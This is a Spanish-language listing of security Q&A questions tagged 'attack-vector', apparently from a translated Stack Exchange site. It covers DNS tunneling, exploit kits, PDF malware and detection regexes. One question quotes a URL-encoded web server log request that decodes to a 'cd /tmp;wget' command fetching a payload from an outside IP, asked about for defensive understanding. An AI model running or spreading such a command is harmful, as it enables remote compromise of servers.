Preguntas con etiqueta 'attack-vector'

1
respuesta

DNS Tunneling - Mitigación

Creo que la causa raíz de los túneles de DNS se debe a que los hosts internos tienen permiso para realizar consultas recursivas de dominios externos. Para que el túnel DNS funcione, un host interno debería poder enviar consultas al dominio contr...
hecha 01.02.2017 - 06:58
1
respuesta

¿Cufon o Prototipo como un vector de ataque para el kit de exploits Blackhole?

Se me pidió que examinara la seguridad de un sitio cliente que aparentemente está lanzando mensajes antivirales cuando se los visita. Específicos: Se está detectando como un kit de exploits Blackhole dentro de una fuente Cufon. El explo...
hecha 02.11.2012 - 11:37
5
respuestas

Vulnerabilidades SHA1

Actualmente nos estamos integrando con un componente de terceros en nuestra aplicación web. Parte de esta integración requiere el envío de datos a través de http. Esto se hace a través de los parámetros POST. Se incluye un parámetro adicional en...
hecha 04.11.2016 - 09:01
3
respuestas

¿Se deben BORRAR / eliminar las cuentas de administrador inactivas?

Dado: Una aplicación web Algunas cuentas de administrador activas. Algunas cuentas de administrador inactivas. No existe un mecanismo de "auditoría" para mantener las cuentas antiguas. Los administradores inactivos no pueden iniciar...
hecha 22.11.2016 - 20:10
1
respuesta

¿Cómo podría funcionar este ataque?

Estaba explorando mis registros de apache y encontré la siguiente solicitud (que resultó en un 404): 106.75.130.216 - - [DD/MMM/YYYY:hh:mm:ss] "GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%36%31%2E%31%36%30%2E%32...
hecha 26.03.2017 - 20:29
1
respuesta

Buscando todos los puntos de entrada AJAX

¿Existe alguna herramienta para (automáticamente) encontrar todos los puntos de entrada de JavaScript de back-end dentro de un sitio? Tengo que revisar las vulnerabilidades de un sitio en el código de backend que valida los parámetros AJAX y...
hecha 01.02.2013 - 17:43
1
respuesta

¿El uso de JavaScript por LastPass para cifrar y descifrar la base de datos de contraseñas es un enfoque seguro?

LastPass es un administrador de contraseñas de primera categoría que se presenta como una extensión del navegador y usa una contraseña maestra para cifrar y descifrar la base de datos de contraseñas utilizando el JavaScript. ¿Es esta una forma s...
hecha 12.11.2014 - 07:20
4
respuestas

¿Desea eliminar el malware pdf volviendo a imprimir en un nuevo pdf o extracto de texto?

Considera que tienes un archivo pdf sospechoso que puede contener malware. ¿Sería suficiente con cualquiera de las siguientes: (1) abra el archivo pdf en un entorno virtual y deje que el visor de pdf o el programa pdf-creator imprima en archi...
hecha 03.01.2015 - 05:03
1
respuesta

¿Qué tipo de ataque puede restablecer los privilegios de MySQL y desmontar unidades remotas sin root o shell?

VECTOR DE ATAQUE Golpes mensuales a través de un ataque DDoS global. Resuelto con Cloudflare. El atacante ahora puede desmontar de alguna manera los enlaces de unidad de red y restablecer los permisos de usuario de MySQL para aplicaciones....
hecha 04.03.2015 - 05:06
2
respuestas

Expresiones regulares para explotaciones comunes

Le puse un parche para el Shellshock y unos días más tarde fui asaltado. Sin embargo, no habría sabido que se hubieran hecho intentos si no fuera por una expresión regular que encontré en Internet. Esto me ha inspirado a profundizar en mis regis...
hecha 10.11.2014 - 06:14